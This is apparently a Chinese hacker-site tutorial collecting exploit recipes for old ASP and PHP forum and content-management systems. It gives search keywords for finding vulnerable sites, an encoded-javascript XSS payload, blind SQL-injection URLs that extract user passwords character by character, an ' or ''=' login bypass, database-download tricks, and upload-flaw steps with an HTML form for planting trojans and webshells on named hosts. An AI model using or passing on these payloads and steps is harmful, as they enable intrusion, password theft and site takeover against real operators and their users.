老兵新傳-各種漏洞的利用和一些搜索參數(shù)
各種漏洞的利用和一些搜索參數(shù)
說到漏洞,首先應該提到的就是動網(wǎng)的上傳漏洞了。
"洞網(wǎng)"漏洞拉開了上傳漏洞文件的序幕,其他系統(tǒng)的上
傳漏洞接踵而來!
asp動網(wǎng)論壇漏洞分析
1、這個漏洞不算太嚴重,用過動網(wǎng)論壇的人都知道,發(fā)帖時直接寫javascript會被過濾拆分,寫http會自動加上鏈接,漏洞就在此,在這兩個地方變通一下,把兩個單詞的某個字母換成編碼形式,然后系統(tǒng)再對應地解碼回字母,就達到了避免被過濾的目的。例子說明一下,在發(fā)帖時寫入[img]javas&#x63ript:window.open(‘htt&#x70://www.fwcn.com’,’’)[/img] 很清楚地看到,#x63解碼的字母是"c",#x70解碼的字母是"p",&起到連接作用,最后加上[img],使JS被觸發(fā),如果論壇支持flash插入,用[swf]也可。利用這個漏洞可以搞些惡作劇,寫上誘人的主題,點進去結果是他的主頁(騙點擊率,作廣告),甚至更絕,連到一個有病毒、木馬的網(wǎng)頁上,讓你直想罵娘。這個漏洞存在于動網(wǎng)的各個版本,包括較新的0519版,覆蓋面積之廣讓人瞠目,各人認為應該對某些非法字符進行檢測剔除,而非簡簡單單地拆分了事,真希望動網(wǎng)開發(fā)者能盡早補上這漏洞。
2、比起前者,第二個漏洞問題就大啦,利用該漏洞可以破解掉論壇上所有注冊會員的密碼(恐怖~~~),由于論壇管理員通常直接把論壇程序載下來梢加以美工就拿來使用了,圖方便直接導致了漏洞的出現(xiàn),我們也載一個回來,只要看一下動網(wǎng)的數(shù)據(jù)庫,就知道了密碼的字段為userpassword,接著例如要破一個名叫abc的用戶密碼,首先察看abc的用戶資料,給出的連接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,讀取參數(shù)的語句是:username=trim(request("name")),數(shù)據(jù)庫的查詢的語句是: sql="select * from [user] where username=’"&username&"’",看得出來, abc就是直接被作為了dispuer的一個參數(shù)username,另外,如果該用戶不存在,程序就會給出提示,既然如此,我們就再寫入個查詢密碼的條件,在where username=abc后面加上and userpassword="******",理論上這樣就可以實現(xiàn)對密碼的破解了,但這么破要破到何年何月,現(xiàn)在就要輪到VBS函數(shù)大顯身手了,可以先用len函數(shù)試出用戶的密碼位數(shù),地址就這么寫http://xxxxx/dispuser.asp?name=abc’%20and%20len(userpassword)=5%20and%20’1’=’1,這么看可能不好理解,放到sql語句里其實就是這副樣子:sql="select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1’=’1’",現(xiàn)在明白點了吧,%20是空格,abc后面的單引號和’1’=’1里的單引號都是為了和sql語句相匹配。奇怪,該用戶不存在,喔?那就說明符合這個條件的用戶沒有,繼續(xù),把5換成6,7,8,依此類推,只要能顯示出用戶資料了,就說明密碼位數(shù)猜對了。接下來要做的就是試每位的密碼是多少了,繼續(xù)要用到VBS,可以用left或right或mid函數(shù),http://xxxxx/dispuser.asp?name=abc’%20and%20left(userpassword,1)=’a,如果猜對了就給出用戶資料,猜對了就給出該用戶不存在的提示,這樣子還是嫌太慢,那就在外面再套個asc函數(shù),http://xxxxx/dispuser.asp?name=abc’%20and%20asc(mid(userpassword,1,1))>’50 試出用戶密碼的ASCII碼是否大于50,不斷地縮小范圍,相信很快就能將范圍縮小至個位數(shù),看到這里你是否驚出了一身冷汗,起碼我是如此,靠幾個函數(shù)的靈活運用,保守地說,不出半小時就能破解出密碼。真是不幸中的大幸,動網(wǎng)開發(fā)者在后來的05**版后使用了MD5的加密,這下子總算放心了,但介于國內(nèi)還有許多地方在使用老版本的動網(wǎng)論壇
3 、動網(wǎng)SQL語句漏洞
此漏洞針對動網(wǎng)SQL版本。
測試方法:在http://ip/bbs/admin_index.asp 輸入用戶名是’or’’=’ 密碼也是這個
這樣可以跳過認證
原理:利用SQL語法。輸入的密碼和ID就成為一個合法的SQL語句,直接跳過認證。
此漏洞并不針對動網(wǎng)。很多SQL的ASP都會有這個漏洞
4、動網(wǎng)論壇sp2漏洞 (此漏洞影響范圍甚大,動網(wǎng)官方站、黑客防線、安全基地都曾因此被黑過,具體資料大家可以在百度搜一下)
上傳漏洞路徑:reg_upload.asp及upfile.asp
青創(chuàng)文章系統(tǒng)
打開google 輸入.tw qcdn?。ɑ蛘呤侨グ俣人阉鳌owered by:QCDN_NEWS 但大多數(shù)是中國的)
青創(chuàng)文章系統(tǒng)
上傳漏洞。在網(wǎng)址后加/admin_upfile.asp 如果出現(xiàn)。
Microsoft VBScript 磅︽頂琿巋粇 巋粇 ’800a01b6’
ンぃや穿妮┦┪よ猭: ’form’
/article/admin_upfile.asp, 21
就代表已經(jīng)有90%以上的希望了
桂林老兵的上傳工具上傳木馬
入侵的時候發(fā)現(xiàn)admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊
青創(chuàng)文章管理系統(tǒng)注入功擊
關鍵字"list.asp?unid="
工具:
1、NBSI好像大部分黑客站點都有得下。
?。?、MD5Crack2,破解MD5加密的軟件(磊子推薦:dos下DV.exe比較好用)
第一次檢測的時候,會報告"暫未檢測到注入漏洞";然后在"特征字符"輸入"Unid"
(提示:"Unid"中的" U "一定要是大寫的
"飛龍文章管理系統(tǒng)" 漏洞
飛龍文章管理系統(tǒng) Ver 2.0 Build 20040620 正式版漏洞利用
搜索"Article.asp?ArtID="關鍵字
漏洞文件在
admin_upfile.asp
user_upfile.asp
這兩個文件"upfile.asp"
動網(wǎng)漏洞的再現(xiàn)
上傳時cookie中加"ArtID=1111;"
phpwind 1.3.6 的論壇漏洞的利用
搜索關鍵字"POWER BY PHPWIND v1.3.6"
phpwind1.3.6論壇利用程序 "群共享"中有上傳
保存后,木馬地址為當前目錄下的faq.php
在本機用如下表單進行提交:
<form ENCTYPE="multipart/form-data" ACTION="http://1717t.78cm.com/faq.php"
METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
上傳成功后的木馬存在論壇目錄下
直接訪問就行!
漏洞集合
1)Co Net MiB Ver1.0~4.0 用’or’=’or’登陸管理員(一個比較經(jīng)典的漏洞)
2)ASP Calendar漏洞 請在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01這個信息,程序的默認數(shù)據(jù)庫為o12cal.mdb(非MD5加密,明文保存)
http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc
<%DBPath=Server.MapPath("wz520#.mdb")
Set conn=Server.CreateObject("ADODB.Connection")
conn.Open "Driver={Microsoft Access Driver (*.mdb)};DBQ="&DBPath%>
wz520#.mdb,他就是數(shù)據(jù)庫了。#改成%23就可以下載數(shù)據(jù)庫了
4)青創(chuàng)文章系統(tǒng)出現(xiàn)嚴重漏洞 在網(wǎng)址后加/admin_upfile.asp上傳WEBSHELL
還可以用%5c暴庫,通殺
"list.asp?unid=" " .tw/list.asp?unid= " 存在注入 在"特征字符"輸入"Unid"
("Unid"中的" U "一定要是大寫的)
5)自由動力3.6的軟件上傳過濾不嚴 用WinHex.exe和WSockExpert.exe修改上傳木馬
E時代驛站漏洞
百度搜索"E時代驛站"
漏洞利用頁面 /upload.asp 用老兵直接上傳
沸騰新聞系統(tǒng)上傳漏洞
搜索:沸騰展望新聞系統(tǒng)[核心:塵緣雅境]授權使用
漏洞:沒有對空格進行嚴格的限制。
所以,我們直接選定要上傳的asp木馬,然后在后面加上空格
它的上傳文件是UploadFaceOK.asp
相關文章
曉宇聽幽網(wǎng)站內(nèi)容管理系統(tǒng) V2.0
曉宇聽幽網(wǎng)站內(nèi)容管理系統(tǒng) V2.0...2007-01-012007 10.30動易網(wǎng)站管理系統(tǒng)vote.asp頁面存在SQL注入漏洞
2007 10.30動易網(wǎng)站管理系統(tǒng)vote.asp頁面存在SQL注入漏洞...2007-12-12